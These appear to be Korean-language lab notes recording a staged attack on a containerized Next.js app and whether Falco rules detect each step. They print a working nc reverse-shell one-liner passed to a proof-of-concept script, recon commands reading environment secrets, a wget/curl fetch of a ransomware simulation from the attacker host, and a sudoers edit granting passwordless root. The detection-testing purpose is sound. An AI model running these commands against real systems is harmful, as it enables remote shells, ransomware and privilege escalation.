
공격 시나리오 실행 (step1-2. 초기침투 및 내부정보 수집 )
node poc.mjs http://192.168.10.62:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.10.25 4444 >/tmp/f"

하늘색(즉 첫번째 로그가)내가 설정한 룰인 것 확인 가능
두번째 (Hacker Tool Execution)은 기본룰임 - nc를 사용했기 때문에 탐지
| 항목 | 로그 1 (커스텀 룰) | 로그 2 (기본 룰) |
| 적용 룰 | Interrupt_RCE_Reverse_Shell | Hacker Tool Execution |
| 탐지 명분 | Node 프로세스가 비정상적인 쉘을 생성함 | 시스템에서 위험 도구(nc)가 실행됨 |
| 공격 단계 | [STAGE 1] 초기 침투 및 리버스 쉘 | 횡적 이동/정보 수집 준비 |
| 실행 사용자 | root | root |

→ 내가 팔코를 6단계에 sed작업을 모두 출력하라 해놔서 좀 민감하게 잡는 문제.
→ 리버스쉘 공격과는 무관한 우분투 호스트 시스템의 배경작업이 탐지된 전형적인 오탐
내부 조사를 위해 입력한 기본 값
id
pwd
ls -al
uname -a
cat /etc/os-release
env
cat .env

- 7개의 명령어를 다 캐치 못하고 3개만 한 이유?
- → 커스텀 룰로 다 설정을 안해뒀기 때문
공격 시나리오 실행 (step3. 악성 페이로드 실행)
칼리에 배포할 랜섬웨어 있는지 확인 (리버스쉘을 통해 칼리에 접속해서 이 ransomware_sim.sh 파일을 다운받을 예정)

그리고 python 임시 서버를 열어둬야함

그리고 공격 시나리오 용 파일 생성 (이 파일이 저 ransomware.sh 을 통해 암호화 될 예정)
리버스쉘에서 입력

이후 리버스쉘에서 kali에 접속하여
를 wget 명령어를 통해 다운
# 1. /tmp 폴더로 이동
cd /tmp
# 2. Kali(192.168.10.25)에서 파일 다운로드
curl -o ransomware_sim.sh http://192.168.10.25/ransomware_sim.sh
#curl이 안되서 wget으로 실행
wget http://192.168.10.25/ransomware_sim.sh


이게 저 랜섬웨어 파일에 권한 부여하고 실행

→ 당연히 실행은 탐지 안되고 권한 부여한것만 탐지됨
추가로 랜섬웨어 실행된건지 확인

공격 시나리오 실행 (step4. 권한 상승)의도적으로 우분투에 SUID 취약점 만들어주기 (윗 부분 토글 보기)(BusyBox에 SUID 권한은 잘 들어갔지만 busybox 내부의 쉘이 실행될 때 내 권한root랑 실행한 사람node-user가 달라서 권한을 버리게 됨.)
따라서 그냥 sudoers 설정을 조작해버리는 방식으로 실행
→ BusyBox의 보안 기능으로 인해 실패.
전의 공격 방식으로 시도하면 안됨.
## ubuntu에서 실행
docker exec -u root react2shell-poc-nextjs-1 sh -c "echo 'node-user ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers"
## 리버스쉘에서 실행
sudo -n id